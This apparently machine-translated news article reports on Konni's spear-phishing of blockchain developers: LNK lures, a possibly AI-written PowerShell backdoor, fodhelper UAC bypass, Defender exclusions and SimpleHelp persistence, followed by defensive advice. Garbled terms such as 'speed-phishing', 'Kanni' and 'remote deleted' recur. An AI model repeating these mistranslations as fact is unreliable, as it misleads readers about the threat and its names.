Kanni and the IA raise the phishing speed for blockchain developers

A group linked to North Korea has raised the bet: researchers have detected speed-phishing campaigns aimed at developers and engineering teams of the blockchain ecosystem, in which attackers use malware in PowerShell that appears to have been generated with the help of artificial intelligence tools. These operations are no longer limited to the South Korean environment; targets have been observed in Japan, Australia and India, according to the technical analysis published by Check Point Research, which suggests an evolution in the strategy and scope of the actor known as Kanni.

Konni - also traced in the industry under names such as Earth Imp, TA406 or Vedalia - has been active since at least 2014 and has shown considerable flexibility in its tools and objectives. In recent months it has been related to tactics ranging from the exploitation of legitimate services to achieve remote deleted on Android devices to the use of camouflaged links in advertising networks to avoid mail filters. The Genians security center described how the campaign called "Operation Poseidon" took advantage of the online advertising click redirection structure to take victims to malicious files hosted in legitimate or compromised sites ( Genians).

Social engineering remains the favorite entry door: messages that simulate financial notices or transfer confirmations induce the recipient to download a ZIP file. In the incidents documented by Check Point, these ZIP contain a decoy in PDF and a direct access Windows (LNK) that, when opened, runs a embedded PowerShell charger. From there a multilevel chain is triggered: documents are extracted to distract the user, a CAB file is unpacked with a backdoor in PowerShell, tap scripts to prepare persistence and an executable used to try to raise privileges using known UAC techniques, including fodhelper.exe abuse (see MITRE ATT & CK).

The observed backdoor makes checks to evade analysis environments and sandboxes, outlines the system and seeks to consolidate access. After gaining a presence, the attacker deposits a legitimate remote management tool, SimpleHelp, to maintain persistent control and communicates with camouflaged command and control servers under a "filter" that limits traffic only to typical browser connections, making it difficult to detect it by network controls. Part of the technical sophistication is shown in the ability to set exceptions in Microsoft Defender and in the removal of devices to reduce traceability.

What has especially attracted the attention of analysts is the possible intervention of artificial intelligence tools in the creation of the backdoor: its modular design, legible documentation and position-marker-type comments point to an IA-assisted development. This use not only accelerates the production of malicious code, but also tends to homogenize and "polish" malware, making it more sustainable and perhaps more difficult to distinguish from legitimate software.

The convergence of traditional techniques - speed-phishing, abuse of advertising readdresses such as double-click infrastructure, LNK files and exploitation of legitimate services - with emerging practices such as IA-assisted generation represents a strategic change: instead of just looking for credentials or specific data from end-users, attackers point to development environments and supply chains, where a single intrusion can open multiple fronts and compromise entire projects.

This orientation to development teams is not isolated. In parallel, campaigns have been reported using tunnels implanted in Visual Studio Code for remote access, malicious LNK delivering Trojans, and commitments to update business software providers to distribute malware families to customers. Research of signatures such as WithSecure show how incidents in the supply chain and in management tools have been repeatedly exploited by actors for both financial and intelligence purposes.

What can the affected teams do, especially in the blockchain sector and in sensitive developments? First, you have to recover the common sense applied to cybersecurity: distrust of compressed files and direct access received by mail, validate remits and links outside the normal workflow, and avoid running downloaded binaries without prior analysis. From the technical point of view, it is critical to strengthen controls on endpoints, limit the possibility of execution of PowerShell without supervision, audit programmed tasks and high privileges, maintain up-to-date signatures and detections, and apply segmentation and control of outputs on the network to prevent compromised systems from reaching C2 servers. Resources from agencies such as CISA offer practical guides on how to mitigate phishing campaigns and respond to incidents.

It is also important to review internal unit management and update practices; the risk of a legitimate tool or service provider being used as a distribution vector persists, so integrity verification and real-time performance monitoring are essential measures. Verify the use and configuration of RMM solutions like SimpleHelp - and restrict their deployment to what is strictly necessary - reduces the attack surface.

The appearance of malicious code with "signature" of IA poses an additional dilemma: the same technology that speeds up defense (behavior-based detection, automated analysis) can also facilitate attackers to produce more consistent and modular malware. That is why the answer must be double: to improve detection tools and, at the same time, to cultivate human safety hygiene and organizational processes that reduce the likelihood that an reckless click will become a systemic commitment.

In short, the campaign attributed to Konni stresses that threats evolve by combining old tactics with new capabilities. Cooperation between security providers, technology companies and development teams, together with the adoption of basic and advanced controls, is the best way to make it difficult for these attacks to achieve their goal. For more technical details on research and associated indicators, see the report of the Check Point Research and analyses of related actors published by Genians and WithSecure.